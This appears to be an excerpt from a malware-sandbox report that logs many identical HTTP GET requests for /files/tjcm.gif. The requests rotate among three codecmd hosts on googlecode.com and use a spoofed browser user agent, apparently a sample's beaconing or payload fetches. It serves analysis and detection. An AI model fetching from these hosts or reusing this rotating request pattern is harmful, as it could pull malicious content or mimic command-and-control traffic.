                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
